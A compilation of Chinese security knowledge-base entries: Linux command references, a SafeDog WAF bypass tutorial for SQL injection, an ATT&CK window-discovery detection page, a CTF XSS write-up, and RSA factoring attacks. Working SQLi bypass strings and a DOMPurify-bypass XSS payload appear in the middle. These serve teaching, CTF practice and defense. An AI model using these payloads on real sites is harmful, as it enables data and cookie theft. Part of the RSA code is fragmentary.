http://cmpp.linuxforum.net
sec-knowleage
ssh-keygen === 为ssh生成、管理和转换认证密钥 ## 补充说明 **ssh-keygen命令** 用于为“ssh”生成、管理和转换认证密钥,它支持RSA和DSA两种认证密钥。 ### 语法 ```shell ssh-keygen(选项) ``` ### 选项 ```shell -b:指定密钥长度; -e:读取openssh的私钥或者公钥文件; -C:添加注释; -f:指定用来保存密钥的文件名; -i:读取未加密的ssh-v2兼容的私钥/公钥文件,然后在标准输出设备上显示openssh兼容的私钥/公钥; -l:显示公钥文件的指纹数据; -N:提供一个新密语; -P:提供(旧)密语; -q:静默模式; -t:指定要创建的密钥类型。 -y: 读取私钥输出公钥。 ```
sec-knowleage
mii-tool === 配置网络设备协商方式的工具 ## 补充说明 **mii-tool命令** 是用于查看、管理介质的网络接口的状态,有时网卡需要配置协商方式,比如10/100/1000M的网卡半双工、全双工、自动协商的配置。但大多数的网络设备是不用我们来修改协商,因为大多数网络设置接入的时候,都采用自动协商来解决相互通信的问题。不过自动协商也不是万能的,有时也会出现错误,比如丢包率比较高,这时就要我们来指定网卡的协商方式。mii-tool就是能指定网卡的协商方式。下面我们说一说mii-tool的用法。 ### 语法 ```shell usage: mii-tool [-VvRrwl] [-A media,... | -F media] [interface ...] ``` ### 选项 ```shell -V 显示版本信息; -v 显示网络接口的信息; -R 重设MII到开启状态; -r 重启自动协商模式; -w 查看网络接口连接的状态变化; -l 写入事件到系统日志; -A 指令特定的网络接口; -F 更改网络接口协商方式; media: 100baseT4, 100baseTx-FD, 100baseTx-HD, 10baseT-FD, 10baseT-HD,         (to advertise both HD and FD) 100baseTx, 10baseT ``` ### 实例 查看网络接口的协商状态: ```shell [root@localhost ~]# mii-tool -v eth0 eth0: negotiated 100baseTx-FD, link ok   product info: vendor 00:50:ef, model 60 rev 8   basic mode:   autonegotiation enabled   basic status: autonegotiation complete, link ok   capabilities: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD   advertising:  100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD flow-control   link partner: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD ``` 注:上面的例子,我们可以看得到是自动协商,注意红字的部份。 更改网络接口协商方式: 更改网络接口的协商方式,我们要用到`-F`选项,后面可以接100baseT4, 100baseTx-FD, 100baseTx-HD, 10baseT-FD, 10baseT-HD等参数; 如果我们想把网络接口eth0改为1000Mb/s全双工的模式应该怎么办呢? ```shell [root@localhost ~]# mii-tool -F 100baseTx-FD [root@localhost ~]# mii-tool -v eth0 eth0: 100 Mbit, full duplex, link ok product info: vendor 00:00:00, model 0 rev 0 basic mode: 100 Mbit, full duplex basic status: link ok capabilities: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD advertising: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD ``` 注:是不是已经改过来了?当然,我们也一样用ethtool工具来更改,比如执行下面的命令: ```shell [root@localhost ~]# ethtool -s eth0 speed 100 duplex full ```
sec-knowleage
### [第四十一课:bitsadmin一句话下载payload](../Chapter1/41_bitsadmin一句话下载payload.md) ### [第四十二课:攻击FTP服务](../Chapter1/42_攻击FTP服务.md) ### [第四十三课:js一句话下载payload](../Chapter1/43_js一句话下载payload.md) ### [第四十四课:ertutil一句话下载payload补充](../Chapter1/44_ertutil一句话下载payload补充.md) ### [第四十五课:解决bat一句话下载payload黑窗](../Chapter1/45_解决bat一句话下载payload黑窗.md) ### [第四十六课:powershell一句话下载payload](../Chapter1/46_powershell一句话下载payload.md) ### [第四十七课:payload分离免杀思路](../Chapter1/47_payload分离免杀思路.md) ### [第四十八课:payload分离免杀思路第二季](../Chapter1/48_payload分离免杀思路第二季.md) ### [第四十九课:关于Powershell对抗安全软件](../Chapter1/49_关于Powershell对抗安全软件.md) ### [第五十课:基于SqlDataSourceEnumerator发现内网存活主机](../Chapter1/50_基于SqlDataSourceEnumerator发现内网存活主机.md)
sec-knowleage
# 0x00 简介 其实我们过这些waf就是个正则的绕过,因为这种通用型的waf,需要考虑到用户体验,他不能出现什么东西就直接拦截,比正则过滤的一些好绕一点,如何成功绕过我们需要具备对mysql各个函数、语法、特性的熟悉,然后通过不断的fuzz来测试出我们想要的payload的 每个狗的版本不同,他的正则也是不同的所以有的payload在最新版可以用,在老版本就可能用不上,当你的知识量有一定的积累后,绕过waf或许就很简单, 如何快速的提升自己的这些知识,多看文章,多看官方手册。 # 0x01 探索 and 实验环境 : win2003 apache 安全狗4.0.23957 首先我们来探索简单的语句 `and 1=1` ``` and 1 拦截 and '1' 拦截 and a 不拦截 and 'a' 拦截 and ! 不拦截 and 1+1 拦截 and 1+a 拦截 and hex(1) 不拦截 ``` 通过测试我们发现当 and 后面跟上 数字型和字符型时他会给我们拦截掉 ,其实我们在安全狗的规则里面可以看到他拦截 and 和 or 所以我们有2个思路 1. 用其他字符替换 and 或者 or 2. 带入的不是字符串和数字型,带入一个特殊符号 针对第一种我们可以去看看运算符号 随便找到几个`| ^ xor & / * && ||` 等等还有很多 ``` mysql> select '1'|1; +-------+ | '1'|1 | +-------+ | 1 | +-------+ 1 row in set (0.00 sec) mysql> select '1'&1; +-------+ | '1'&1 | +-------+ | 1 | +-------+ 1 row in set (0.00 sec) mysql> select '1'^1; +-------+ | '1'^1 | +-------+ | 0 | +-------+ 1 row in set (0.00 sec) ``` 知道这个了我们带入我们的语法就很简单了 通过运算符来改变ID的值 查看页面是否变化 这是可行的。 ``` mysql> select * from admin where id ='1'|2-- +'; -> ; +------+----------+----------+ | id | username | password | +------+----------+----------+ | 3 | bdmin | fdmin | +------+----------+----------+ 1 row in set (0.00 sec) mysql> select * from admin where id ='1'|1-- +'; -> ; +------+----------+----------+ | id | username | password | +------+----------+----------+ | 1 | cdmin | bdmin | +------+----------+----------+ 1 row in set (0.00 sec) ``` 经过测试你还会发现他的正则不全`&& true` 也是可以的。 那我们可以不可以正面刚`and` `or` 呢,当然也是可行的,前面我们测试过 `and hex(1)` 不拦截其实已经可以拿来判断了,但是我们还要深入的探究 `and hex(1)=` 也是不拦截的 但是后面加入字符型和数字型他又开始拦截,所以我们可以猜测 他判断 = 左右的字符类型,经过测试就能出来很多我们想要的 ``` and ~1>1 and hex(1)>-1 and hex(1)>~1 ``` 再深入探究 你就会发现 安全狗他只在乎 数字型的正数,而不在乎负数,也就是`and -2<-1` 就能过狗,也可能是`-` 绕过了他的正则 # 0x02 探索 union select 1. 内联注释绕过 ``` union 不拦截 select 不拦截 union select 拦截 union 各种字符 select 拦截 union/*select*/ 不拦截 ``` 通过简单的测试我们发现安全狗还是认识我们我们的注释的符号的,所以我们就需要通过这个来绕过我们的安全狗,前面符号一章我讲过注释符号的几种,我们主要使用的是 内联注释 `/*!/*!*/` ``` http://192.168.59.129/Less-1/?id=1' union/*!/*!50000select*/ 1,2,3--+ 拦截 http://192.168.59.129/Less-1/?id=1' union/*!/*!5select*/ 1,2,3--+ 不拦截 ``` 为什么不拦截 ,因为50000是他的版本号,你多一位少一位语句是不能能正常执行的,所以他就放行了,那么我们可以用burp来遍历这个值呢,结果的确是我们想要的 ``` http://192.168.59.129/Less-1/?id=1' union/*!/*!11440select*/ 1,2,3--+ 不拦截 http://192.168.59.129/Less-1/?id=1' union/*!11441/*!11440select*/ 1,2,3--+ 不拦截 http://192.168.59.129/Less-1/?id=1' union/*!11440select*/ 1,2,3--+ 不拦截 http://192.168.59.129/Less-1/?id=-1' union/*!11440/**/%0aselect*/ 1,2,3--+ 不拦截 ``` 这句bypass的核心就在于版本号,然后你就感觉fuzz了千种姿势,但是核心还是这个,最简也是这个,万变不离其宗。 2. 注释绕过 联想注释我们还知道有 -- # 那么他们可以利用吗,当然是肯定的,其实很久以前就有大佬发过这个语句了是 `union %23%0aselect` 因为这些都是单行注释,而%0a 是换行的url编码,大家可以换行后用url编码看看,就是这个, 但是这样已经被加入规则库了,如何绕过呢 非常简单 当然这是个fuzz的过程,其实我只想写出思路,而不是直接给payload。 ``` union %23%0aselect 拦截 union %23select 拦截 union a%23 select 不拦截 union all%23 select 不拦截 union all%23%0a select 不拦截 union %23%0aall select 不拦截 ``` 有时候fuzz右边不行 不如看看左边 为什么可以加all 这个你就得看看mysql手册了,其实测试到最后发现%23%0a中间不能加字符否则会被拦截。 3. -- 注释绕过 -- 其实大佬们也一样很早说了不过最初的姿势是 `-- %0a` 当然已经被加入豪华午餐了,所以我们来测试 ``` union all -- %0a select 拦截 union -- ()%0a select 拦截 union -- 1%0a select 不拦截 union -- hex()%0a select 不拦截 ``` 懂我意思吧,怎么绕出来,发挥你的现象,总之俩开花。 4. 老生常谈 hpp 被人遗忘的手法 前面说过 `/**/` 里面的内容安全狗基本不管了,那么我们用hpp 参数污染来绕过就很简单了 照成这个手法的原因是 web server 对参数的解析问题 在php/apache 中 它总解析最后一个id ``` http://192.168.59.129/Less-1/?id=-1' /*&id='union select 1,user(),3 -- +*/ ``` # 0x03 注入 既然绕过了 `union select` 那么注入就简单了 首先来看个 `user()` ,因为它是被拦截的所以我们需要简单的绕过它 ``` user() 拦截 user/**/() 拦截 user/**/(/**/) 拦截 hex(user/**/(/**/)) 不拦截 ``` 接着就是爆库名 ``` union -- hex()%0a select 1,schema_name,3 from `information_schema`.schemata limit 1,1 ``` 接下来的流传都差不多了 关键点就是在于 from 后面这块 后面的我以这个 `information_schema.schemata` 为例展示几种思路可能有的不能过 ``` `information_schema`.schemata `information_schema`.`schemata` information_schema.`schemata` (information_schema.schemata) information_schema/**/.schemata ``` # 0x04 文末 这么多手法又有多少人认真看了呢,认真去试过,探索。 #### 本文如有错误,请及时提醒,避免误导他人 * author:404
sec-knowleage
# T1010-win-应用程序窗口发现 ## 来自ATT&CK的描述 攻击者可能会尝试获取打开的应用程序窗口的列表。窗口列表可以传达有关如何使用系统的信息,也可以为键盘记录程序收集的信息提供上下文。 在Mac中,可以使用小的AppleScript脚本本机完成。 ## 测试案例 Windows server 2016模拟执行以下命令发现正在运行的应用程序窗口。 ```powershell get-process | where-object {$_.mainwindowtitle -ne ""} | Select-Object mainwindowtitle ``` 通过COM方法获取应用程序窗口,还包括过程路径和窗口位置坐标: ```powershell [activator]::CreateInstance([type]::GetTypeFromCLSID("13709620-C279-11CE-A49E-444553540000")).windows() ``` ## 检测日志 Windows powershell日志(值得注意的是:你需要开启powershell审核策略,低版本powershell无法对命令行参数进行记录) ## 测试复现 ![T1010](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/MzLX7T.png) ## 测试留痕 ![T1010-4104](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/Mz7UIJ-20220502165529558.png) ![T1010-4104](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/MzODbV.png) ## 检测规则/思路 ### sigma规则 ```yml title: windows本地执行Powershell命令,枚举应用程序窗口 description: windows server 2016 references: 暂无 tags: T1010 status: experimental author: 12306Bro logsource: product: windows service: powershell detection: selection: EventID: 4104 #执行远程命令 message: - 'get-process | where-object {$_.mainwindowtitle -ne ""} | Select-Object mainwindowtitle' #基于命令行参数检测,检出率较低 - [activator]::CreateInstance([type]::GetTypeFromCLSID("13709620-C279-11CE-A49E-444553540000")).windows() #基于命令行参数检测,检出率较低 condition: selection level: low ``` ### 建议 当攻击者了解环境时,系统和网络发现技术通常会在整个操作中出现。不应孤立地看待数据和事件,而应将其视为行为链的一部分,这些行为可能导致基于所获取信息的其他活动。 监视进程和命令行参数以了解可以采取哪些措施来收集系统和网络信息。具有内置功能的远程访问工具可以直接与Windows API交互以收集信息。也可以通过Windows系统管理工具(例如Windows Management Instrumentation和PowerShell)来获取信息。 ## 参考推荐 MITRE-ATT&CK-T1010 <https://attack.mitre.org/techniques/T1010/> 应用程序窗口发现 <https://ired.team/offensive-security/enumeration-and-discovery/t1010-application-window-discovery>
sec-knowleage
groupmod === 更改群组识别码或名称 ## 补充说明 **groupmod命令** 更改群组识别码或名称。需要更改群组的识别码或名称时,可用groupmod指令来完成这项工作。 ### 语法 ```shell groupmod(选项)(参数) ``` ### 选项 ```shell -g<群组识别码>:设置欲使用的群组识别码; -o:重复使用群组识别码; -n<新群组名称>:设置欲使用的群组名称。 ``` ### 参数 组名:指定要修改的工作的组名。
sec-knowleage
# bfnote This is **unintended** solution. For intended one see other writeups here: [https://ctftime.org/task/13089](https://ctftime.org/task/13089) In this challenge we can make a POST request to the server containing brainfuck code. Then we can send the prepared brainfuck note to the admin. That suggests that the solution is XSS and the flag is somewhere in admin's cookie. The code is displayed, but previously sanitized by DOMPurify: ```javascript document.getElementById('program').innerHTML = DOMPurify.sanitize(program).toString(); ``` and then executed - however, the result is also sanitized using: ```html output = output.replaceAll('<', '&lt;').replaceAll('>', '&gt;') ``` The intended solution required us to use google recaptcha's callback mechanism. Fortunately for us (and unfortunately for challenge author...) a 1-day bug in DOMPurify has been announced and fixed during the CTF. As the challenge was using a pinned version of library, it was made possible to inject malicious code - with some little filtering on the way. The final payload: ``` [<math><mtext><table><mglyph><style><math><img src="x" onerror="window.output.innerHTML=window.output.innerText"><img src="x" onerror="window.output.innerHTML=window.output.innerText"></math>]----[---->+<]>---.-[--->+<]>.++++.------.-[--->+<]>--.---[->++++<]>-.-.++++[->+++<]>+.[--->++<]>-----.+[-->+<]>+++.----[->++++<]>.[---->+<]>++++.--.+++++[->+++<]>.-.---------.+++++++++++++..---.+++.[-->+<]>++++.+[-->+<]>+++.-[->+++<]>.[--->++<]>-----.[----->++++<]>.+++++++++++.------------.-[--->+<]>-.--------.--------.+++++++++.++++++.[++>---<]>.--[--->+<]>-.-[--->+<]>----.-------------.----.--[--->+<]>-.+++[->+++<]>.+[--->++<]>+.-[--->+<]>.-------.++++++++.--------.+++++++++.++++++.+[--->+<]>+.-.----[->+++<]>.++++.------.-----[->+++<]>+.++.-[-->+++<]>-.[->++++++<]>+.-[-->+<]>---.[--->++<]>-.-.++++[->+++<]>+.[--->++<]>-----.-[--->++<]>-.----[->+++<]>-.++++++++++++..----.+++.+[-->+<]>.-----------..++[--->++<]>+.[->+++<]>.---.++++++.+++++++..----.[->++++++++++<]>.[--->++<]>-.----------.+++++++++++.+++[->+++<]>.[->+++<]>.+[->++<]>+.++++.-[-->+<]>.[->++<]>-.--.-[++++>-----<]>.--.++.-----------.-[--->+<]>++.[-->+<]>++++.-----[->++<]>.[-->+<]>-.----.+++++++.--.[->++<]>-.--.-[-->+<]>---.+++[->++<]>+.+[-->+<]>+++..---[->++<]>.[-->+<]>----.-[--->+<]>++.[-->+<]>+++.----.++.--[->++<]>-.+.--.[-->+<]>.++++.--.+++.-----.[----->+<]>++.+++[-->+++<]>.[--->++<]>-----.-[--->++<]>-.++++.+[--->+<]>.+++++++++++.------------.-[--->+<]>-.--------.--------.+++++++++.++++++.[++>---<]>.--[--->+<]>-.++++++++++++..----.--.----.++++[->+++<]>.+[--->+++++<]>.+++++++++++.------------.-[--->+<]>-.--------.--------.+++++++++.++++++.[++>---<]>.+++[->++<]>.+++++++++++++.-----------.+[--->+<]>++.-----[++>---<]>.++[->++<]>+.-[++>-----<]>..-----------.+++++++++.----------.-[--->++<]>+.+[-->+++<]>++.+.+++.--------.-[->+++<]>-.+[--->+<]>.[->+++<]>.-------.---[->++<]>. ``` and the flag that made us aware this was not intended solution: ``` TWCTF{reCAPTCHA_Oriented_Programming_with_XSS!} ```
sec-knowleage
# 模数相关攻击 ## 暴力分解 N ### 攻击条件 在 N 的比特位数小于 512 的时候,可以采用大整数分解的策略获取 p 和 q。 ### JarvisOJ - Easy RSA 这里我们以 "JarvisOJ - Easy RSA" 为例进行介绍,题目如下 > 还记得 veryeasy RSA 吗?是不是不难?那继续来看看这题吧,这题也不难。 > 已知一段 RSA 加密的信息为:0xdc2eeeb2782c 且已知加密所用的公钥: > N=322831561921859 e = 23 > 请解密出明文,提交时请将数字转化为 ascii 码提交 > 比如你解出的明文是 0x6162,那么请提交字符串 ab > 提交格式:`PCTF{明文字符串}` 可以看出,我们的 N 比较小,这里我们直接使用 factordb 进行分解,可以得到 $$ 322831561921859 = 13574881 \times 23781539 $$ 进而我们简单编写程序如下 ```python import gmpy2 p = 13574881 q = 23781539 n = p * q e = 23 c = 0xdc2eeeb2782c phin = (p - 1) * (q - 1) d = gmpy2.invert(e, phin) p = gmpy2.powmod(c, d, n) tmp = hex(p) print tmp, tmp[2:].decode('hex') ``` 结果如下 ```shell ➜ Jarvis OJ-Basic-easyRSA git:(master) ✗ python exp.py 0x33613559 3a5Y ``` ## p & q 不当分解 N ### 攻击条件 当 RSA 中 p 和 q 选取不当时,我们也可以进行攻击。 ### |p-q| 很大 当 p-q 很大时,一定存在某一个参数较小,这里我们假设为 p,那么我们可以通过穷举的方法对模数进行试除,从而分解模数,得到保密参数与明文信息。基本来说,不怎么可行。 ### |p-q| 较小 首先 $$ \frac{(p+q)^2}{4}-n=\frac{(p+q)^2}{4}-pq=\frac{(p-q)^2}{4} $$ 既然 |p-q| 较小,那么 $\frac{(p-q)^2}{4}$ 自然也比较小,进而 $\frac{(p+q)^2}{4}$ 只是比 N 稍微大一点,所以 $\frac{p+q}{2}$ 与 $\sqrt{n}$ 相近。那么我们可以按照如下方法来分解 - 顺序检查 $\sqrt{n}$ 的每一个整数 x,直到找到一个 x 使得 $x^2-n$ 是平方数,记为 $y^2$ - 那么 $x^2-n=y^2$,进而根据平方差公式即可分解 N ### p - 1 光滑 * 光滑数(Smooth number):指可以分解为小素数乘积的正整数 * 当$p$是$N$的因数,并且$p-1$是光滑数,可以考虑使用`Pollard's p-1`算法来分解$N$ * 根据费马小定理有 $$若p\nmid a,\ 则a^{p-1}\equiv 1\pmod{p}$$ 则有 $$a^{t(p-1)}\equiv 1^t \equiv 1\pmod{p}$$ 即 $$a^{t(p-1)} - 1 = k*p$$ * 根据`Pollard's p-1`算法: 如果$p$是一个$B-smooth\ number$,那么则存在 $$M = \prod_{q\le{B}}{q^{\lfloor\log_q{B}\rfloor}}$$ 使得 $$(p-1)\mid M$$ 成立,则有 $$\gcd{(a^{M}-1, N)}$$ 如果结果不为$1$或$N$,那么就已成功分解$N$。 因为我们只关心最后的gcd结果,同时`N`只包含两个素因子,则我们不需要计算$M$,考虑$n=2,3,\dots$,令$M = n!$即可覆盖正确的$M$同时方便计算。 * 在具体计算中,可以代入降幂进行计算 $$ a^{n!}\bmod{N}=\begin{cases} (a\bmod{N})^2\mod{N}&n=2\\ (a^{(n-1)!}\bmod{N})^n\mod{N}&n\ge{3} \end{cases}$$ * Python代码实现 ```python from gmpy2 import * a = 2 n = 2 while True: a = powmod(a, n, N) res = gcd(a-1, N) if res != 1 and res != N: q = N // res d = invert(e, (res-1)*(q-1)) m = powmod(c, d, N) print(m) break n += 1 ``` ### p + 1 光滑 * 当$p$是$N$的因数,并且$p+1$是光滑数,可以考虑使用`Williams's p+1`算法来分解$N$ * 已知$N$的因数$p$,且$p+1$是一个光滑数 $$ p = \left(\prod_{i=1}^k{q_i^{\alpha_i}}\right)+1 $$ $q_i$即第$i$个素因数且有$q_i^{\alpha_i}\le B_1$, 找到$\beta_i$使得让$q_i^{\beta_i}\le B_1$且$q_i^{\beta_i+1}> B_1$,然后令 $$ R = \prod_{i=1}^k{q_i^{\beta_i}} $$ 显然有$p-1\mid R$且当$(N, a) = 1$时有$a^{p-1}\equiv 1 \pmod{p}$,所以有$a^R\equiv 1\pmod{p}$,即 $$ p\mid(N, a^R-1) $$ * 令$P,Q$为整数,$\alpha,\beta$为方程$x^2-Px+Q=0$的根,定义如下类卢卡斯序列 $$ \begin{aligned} U_n(P, Q) &= (\alpha^n -\beta^n)/(\alpha - \beta)\\ V_n(P, Q) &= \alpha^n + \beta^n \end{aligned} $$ 同样有$\Delta = (\alpha - \beta)^2 = P^2-4Q$,则有 $$ \begin{cases} U_{n+1} &= PU_n - QU_{n-1}\\ V_{n+1} &= PV_n - QV_{n-1} \end{cases}\tag{2.2} $$ $$ \begin{cases} U_{2n} &= V_nU_n\\ V_{2n} &= V_n^2 - 2Q^n \end{cases}\tag{2.3} $$ $$ \begin{cases} U_{2n-1} &= U_n^2 - QU_{n-1}^2\\ V_{2n-1} &= V_nV_{n-1} - PQ^{n-1} \end{cases}\tag{2.4} $$ $$ \begin{cases} \Delta U_{n} &= PV_n - 2QV_{n-1}\\ V_{n} &= PU_n - 2QU_{n-1} \end{cases}\tag{2.5} $$ $$ \begin{cases} U_{m+n} &= U_mU_{n+1} - QU_{m-1}U_n\\ \Delta U_{m+n} &= V_mV_{n+1} - QV_{m-1}V_n \end{cases}\tag{2.6} $$ $$ \begin{cases} U_{n}(V_k(P, Q), Q^k) &= U_{nk}(P, Q)/U_k(P, Q)\\ V_{n}(V_k(P, Q), Q^k) &= V_n(P, Q) \end{cases}\tag{2.7} $$ 同时我们有如果$(N, Q) = 1$且$P^{'}Q\equiv P^2-2Q\pmod{N}$,则有$P^{'}\equiv \alpha/\beta + \beta/\alpha$以及$Q^{'}\equiv \alpha/\beta + \beta/\alpha = 1$,即 $$ U_{2m}(P, Q)\equiv PQ^{m-1}U_m(P^{'}, 1)\pmod{N}\tag{2.8} $$ 根据扩展卢卡斯定理 >如果p是奇素数,$p\nmid Q$且勒让德符号$(\Delta/p) = \epsilon$,则 $$ \begin{aligned} U_{(p-\epsilon)m}(P, Q) &\equiv 0\pmod{p}\\ V_{(p-\epsilon)m}(P, Q) &\equiv 2Q^{m(1-\epsilon)/2}\pmod{p} \end{aligned} $$ * `第一种情况`:已知N的因数p,且p+1是一个光滑数 $$ p = \left(\prod_{i=1}^k{q_i^{\alpha_i}}\right)-1 $$ 有$p+1\mid R$,当$(Q, N)=1$且$(\Delta/p) = -1$时有$p\mid U_R(P, Q)$,即$p\mid (U_R(P, Q), N)$ 为了找到$U_R(P, Q)$,`Guy`和`Conway`提出可以使用如下公式 $$ \begin{aligned} U_{2n-1} &= U_n^2 - QU_n^2 - 1\\ U_{2n} &= U_n(PU_n - 2QU_{n-1})\\ U_{2n+1} &= PU_{2n} - QU_{2n-1} \end{aligned} $$ 但是上述公式值太大了,不便运算,我们可以考虑如下方法 如果$p \mid U_R(P, 1)$,根据`公式2.3`有$p\mid U_{2R}(P, Q)$,所以根据`公式2.8`有$p \mid U_R(P^{'}, 1)$,设$Q=1$,则有 $$ V_{(p-\epsilon)m}(P, 1) \equiv 2\pmod{p} $$ 即,如果$p\mid U_R(P, 1)$,则$p\mid(V_R(P, 1) -2)$. 第一种情况可以归纳为: 让$R = r_1r_2r_3\cdots r_m$,同时找到$P_0$使得$(P_0^2-4, N) = 1$,定义$V_n(P) = V_n(P, 1), U_n(P) = U_n(P, 1)$且 $$ P_j \equiv V_{r_j}(P_{j-1})\pmod{N}(j = 1,2,3,\dots,m) $$ 根据`公式2.7`,有 $$ P_m \equiv V_R(P_0)\pmod{N}\tag{3.1} $$ 要计算$V_r = V_r(P)$可以用如下公式 根据`公式2.2`,`公式2.3`,`公式2.4`有 $$ \begin{cases} V_{2f-1}&\equiv V_fV_{f-1}-P\\ V_{2f}&\equiv V_f^2 - 2\\ V_{2f+1}&\equiv PV_f^2-V_fV_{f-1}-P\pmod(N) \end{cases} $$ 令 $$ r = \sum_{i=0}^t{b_t2^{t-i}}\ \ \ \ (b_i=0,1) $$ $f_0=1, f_{k+1}=2f_k+b_{k+1}$,则$f_t=r$,同样$V_0(P) = 2, V_1(P) = P$,则最终公式为 $$ (V_{f_{k+1}}, V_{f_{k+1}-1}) = \begin{cases} (V_{2f_k}, V_{2f_k-1})\ \ \ \ if\ b_{k+1}=0\\ (V_{2f_k+1}, V_{2f_k})\ \ \ \ if\ b_{k+1}=1 \end{cases} $$ * `第二种情况`:已知p+1是一个光滑数 $$ p = s\left(\prod_{i=1}^k{q_i^{\alpha_i}}\right)-1 $$ 当$s$是素数,且$B_1<s\le B_2$,有$p\mid(a_m^s-1, N),$定义$s_j$和$2d_j$ $$ 2d_j = s_j+1-s_j $$ 如果$(\Delta/p) = -1$且$p\nmid P_m-2$,则根据`公式2.7`和`公式3.1`有$p\mid(U_s(P_m), N)$。 令$U[n] \equiv U_n(P_m), V[n]\equiv V_n(P_m)\pmod{N}$,计算$U[2d_j-1], U[2d_j], U[2d_j+1]$通过 $$U[0] = 0, U[1] = 1, U[n+1] = P_mU[n] - U[n-1]$$ 计算 $$ T[s_i] \equiv \Delta U_{s_i}(P_m) = \Delta U_{s_iR}(P_0)/U_R(P_0)\pmod{N} $$ 通过`公式2.6`,`公式2.7`和`公式3.1`有 $$ \begin{cases} T[s_1]&\equiv P_mV[s_1]-2V[s_1-1]\\ T[s_1-1]&\equiv 2V[s_1]-P_mV[s_1-1]\pmod{N} \end{cases} $$ 即 $$ \begin{cases} T[s_{i+1}]&\equiv T[s_i]U[2d_i+1]-T[s_i-1]U[2d_i]\\ T[s_{i+1}-1]&\equiv T[s_i]U[2d_i]-T[s_i-1]U[2d_i-1]\pmod{N} \end{cases} $$ 计算$T[s_i], i=1,2,3\dots$,然后计算 $$ H_t = (\prod_{i=0}^c{T[s_{i+t}], N}) $$ 其中$t = 1, c+1, 2c+1, \dots, c[B_2/c]+1$,我们有$p\mid H_i$当$(\Delta/p)=-1$ * python代码实现 ```python def mlucas(v, a, n): """ Helper function for williams_pp1(). Multiplies along a Lucas sequence modulo n. """ v1, v2 = v, (v**2 - 2) % n for bit in bin(a)[3:]: v1, v2 = ((v1**2 - 2) % n, (v1*v2 - v) % n) if bit == "0" else ((v1*v2 - v) % n, (v2**2 - 2) % n) return v1 for v in count(1): for p in primegen(): e = ilog(isqrt(n), p) if e == 0: break for _ in xrange(e): v = mlucas(v, p, n) g = gcd(v-2, n) if 1 < g < n: return g # g|n if g == n: break ``` ### 2017 SECCON very smooth 该程序给了一个 HTTPS 加密的流量包,首先从其中拿到证书 ```shell ➜ 2017_SECCON_verysmooth git:(master) binwalk -e s.pcap DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 2292 0x8F4 Certificate in DER format (x509 v3), header length: 4, sequence length: 467 4038 0xFC6 Certificate in DER format (x509 v3), header length: 4, sequence length: 467 5541 0x15A5 Certificate in DER format (x509 v3), header length: 4, sequence length: 467 ➜ 2017_SECCON_verysmooth git:(master) ls s.pcap _s.pcap.extracted very_smooth.zip ``` 这里分别查看三个证书,三个模数都一样,这里只给一个例子 ``` ➜ _s.pcap.extracted git:(master) openssl x509 -inform DER -in FC6.crt -pubkey -text -modulus -noout -----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDVRqqCXPYd6Xdl9GT7/kiJrYvy 8lohddAsi28qwMXCe2cDWuwZKzdB3R9NEnUxsHqwEuuGJBwJwIFJnmnvWurHjcYj DUddp+4X8C9jtvCaLTgd+baSjo2eB0f+uiSL/9/4nN+vR3FliRm2mByeFCjppTQl yioxCqbXYIMxGO4NcQIDAQAB -----END PUBLIC KEY----- Certificate: Data: Version: 1 (0x0) Serial Number: 11640506567126718943 (0xa18b630c7b3099df) Signature Algorithm: sha256WithRSAEncryption Issuer: C=JP, ST=Kawasaki, O=SRL Validity Not Before: Oct 8 02:47:17 2017 GMT Not After : Oct 8 02:47:17 2018 GMT Subject: C=JP, ST=Kawasaki, O=SRL Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (1024 bit) Modulus: 00:d5:46:aa:82:5c:f6:1d:e9:77:65:f4:64:fb:fe: 48:89:ad:8b:f2:f2:5a:21:75:d0:2c:8b:6f:2a:c0: c5:c2:7b:67:03:5a:ec:19:2b:37:41:dd:1f:4d:12: 75:31:b0:7a:b0:12:eb:86:24:1c:09:c0:81:49:9e: 69:ef:5a:ea:c7:8d:c6:23:0d:47:5d:a7:ee:17:f0: 2f:63:b6:f0:9a:2d:38:1d:f9:b6:92:8e:8d:9e:07: 47:fe:ba:24:8b:ff:df:f8:9c:df:af:47:71:65:89: 19:b6:98:1c:9e:14:28:e9:a5:34:25:ca:2a:31:0a: a6:d7:60:83:31:18:ee:0d:71 Exponent: 65537 (0x10001) Signature Algorithm: sha256WithRSAEncryption 78:92:11:fb:6c:e1:7a:f7:2a:33:b8:8b:08:a7:f7:5b:de:cf: 62:0b:a0:ed:be:d0:69:88:38:93:94:9d:05:41:73:bd:7e:b3: 32:ec:8e:10:bc:3a:62:b0:56:c7:c1:3f:60:66:a7:be:b9:46: f7:46:22:6a:f3:5a:25:d5:66:94:57:0e:fc:b5:16:33:05:1c: 6f:f5:85:74:57:a4:a0:c6:ce:4f:fd:64:53:94:a9:83:b8:96: bf:5b:a7:ee:8b:1e:48:a7:d2:43:06:0e:4f:5a:86:62:69:05: e2:c0:bd:4e:89:c9:af:04:4a:77:a2:34:86:6a:b8:d2:3b:32: b7:39 Modulus=D546AA825CF61DE97765F464FBFE4889AD8BF2F25A2175D02C8B6F2AC0C5C27B67035AEC192B3741DD1F4D127531B07AB012EB86241C09C081499E69EF5AEAC78DC6230D475DA7EE17F02F63B6F09A2D381DF9B6928E8D9E0747FEBA248BFFDFF89CDFAF4771658919B6981C9E1428E9A53425CA2A310AA6D760833118EE0D71 ``` 可以看出模数只有 1024 比特。而且,根据题目名 very smooth,应该是其中一个因子比较 smooth,这里我们利用 primefac 分别尝试 Pollard's p − 1 与 Williams's p + 1 算法,如下 ```shell ➜ _s.pcap.extracted git:(master) python -m primefac -vs -m=p+1 149767527975084886970446073530848114556615616489502613024958495602726912268566044330103850191720149622479290535294679429142532379851252608925587476670908668848275349192719279981470382501117310509432417895412013324758865071052169170753552224766744798369054498758364258656141800253652826603727552918575175830897 149767527975084886970446073530848114556615616489502613024958495602726912268566044330103850191720149622479290535294679429142532379851252608925587476670908668848275349192719279981470382501117310509432417895412013324758865071052169170753552224766744798369054498758364258656141800253652826603727552918575175830897: p+1 